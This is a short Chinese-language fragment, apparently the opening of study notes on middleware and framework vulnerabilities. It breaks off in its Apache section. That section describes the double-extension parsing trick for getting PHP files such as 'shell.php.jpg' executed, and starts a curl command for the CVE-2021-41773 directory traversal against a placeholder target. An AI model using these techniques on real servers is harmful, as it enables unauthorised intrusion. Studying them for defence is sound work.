重要程度:⭐⭐⭐中间件和框架漏洞可快速入侵大量系统目录1. Web服务器漏洞2. 应用服务器漏洞3. 框架漏洞4. 防御措施1. Web服务器漏洞1.1 Apache漏洞解析漏洞# Apache从右向左解析 test.php.xxx → 解析为PHP shell.php.jpg → 解析为PHP目录遍历# CVE-2021-41773 curl http://target/cgi-